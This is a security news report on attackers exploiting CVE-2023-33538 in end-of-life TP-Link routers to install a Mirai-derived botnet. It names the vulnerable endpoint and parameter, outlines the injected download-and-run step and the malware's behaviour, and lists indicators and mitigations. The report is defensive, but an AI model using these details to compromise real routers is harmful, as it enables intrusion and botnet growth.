Hackers are actively exploiting a critical vulnerability, CVE-2023-33538, in several end-of-life TP-Link Wi-Fi routers to deploy Mirai-based botnet malware. These unpatched devices, no longer receiving security updates from the vendor, are prime targets for attackers seeking to expand their malicious networks. The exploited flaw resides within the routers’ web management interfaces, specifically in how certain parameters are handled, allowing remote command execution.
The vulnerability affects specific models including the TL-WR940N (versions 2 and 4), TL-WR740N (versions 1 and 2), and TL-WR841N (versions 8 and 10). Researchers at Palo Alto Networks’ Unit 42 identified large-scale, automated exploitation attempts of this flaw around June 2025, shortly after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2023-33538 to its Known Exploitable Vulnerabilities (KEV) catalog. The attacks leverage a common weakness in the routers’ firmware, enabling attackers to gain unauthorized control.
Inside the CVE-2023-33538 Exploit and Mirai Malware
The exploitation method involves sending specially crafted HTTP GET requests to the /userRpm/WlanNetworkRpm endpoint of the affected TP-Link routers. Attackers embed malicious commands within the ‘ssid’ parameter of these requests. The router’s firmware, lacking proper input validation, processes these commands without filtering harmful content. This critical oversight allows attackers to inject and execute arbitrary code on the device.
Once the commands are accepted, the router is instructed to download an ELF binary, identified as ‘arm7’, from a remote server located at IP address 51.38.137[.]113. This binary is then granted full execution permissions and run immediately, effectively taking control of the compromised router. The ‘arm7’ binary is a variant of the Condi IoT botnet, a family of malware known to be derived from the notorious Mirai botnet. Upon successful infection, the malware establishes a connection to a command-and-control (C2) server, integrating the compromised device into a larger botnet.
The C2 domain associated with these Mirai-like botnet operations, cnc.vietdediserver[.]shop, has been confirmed as malicious. Unit 42’s analysis revealed that the arm7 binary is designed to maintain persistence and actively expand the botnet. It listens for specific byte-pattern commands from its C2 server. In response, it sends regular heartbeat signals to maintain its connection, initiates self-update routines to ensure it remains functional and up-to-date, and launches internal HTTP server functions.
Inside the Arm7 Malware Binary
A significant feature of the arm7 malware is its self-update mechanism. The ‘update_bins()’ function within the binary is hard-coded to connect back to the IP address 51.38.137[.]113 on TCP port 80. From this server, it can download updated versions of itself compiled for a variety of CPU architectures, including arm6, mips, sh4, and x86_64. This ensures that the malware can infect and operate on a wide range of Internet of Things (IoT) devices.
Furthermore, the arm7 binary initiates an HTTP server on the infected router. This server operates on a randomly selected port between 1024 and 65535. Once active, this local HTTP server serves fresh copies of the malware to any other devices that connect to it. This feature allows each newly infected router to act as a distribution point, spreading the infection across networks without direct intervention from the initial attacker.
Despite the ongoing exploitation, researchers observed technical errors in the observed attack attempts. Attackers incorrectly targeted the ‘ssid’ parameter instead of the ‘ssid1’ parameter, which is the actual vulnerable attribute. Additionally, the injected commands relied on the ‘wget’ utility, which is typically not present in the router’s limited BusyBox environment. However, the underlying vulnerability is confirmed, and a more precise attacker could successfully compromise these devices.
TP-Link has confirmed that the affected routers are considered end-of-life and will not receive any vendor patches. The company strongly advises users to replace these vulnerable devices with currently supported hardware. Changing the default administrator login credentials from ‘admin:admin’ is also a critical security measure, as exploiting CVE-2023-33538 requires authenticated access to the router’s web interface. Network administrators should actively monitor outbound traffic for connections to known malicious domains and ensure that any identified affected TP-Link router models are retired from their networks.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.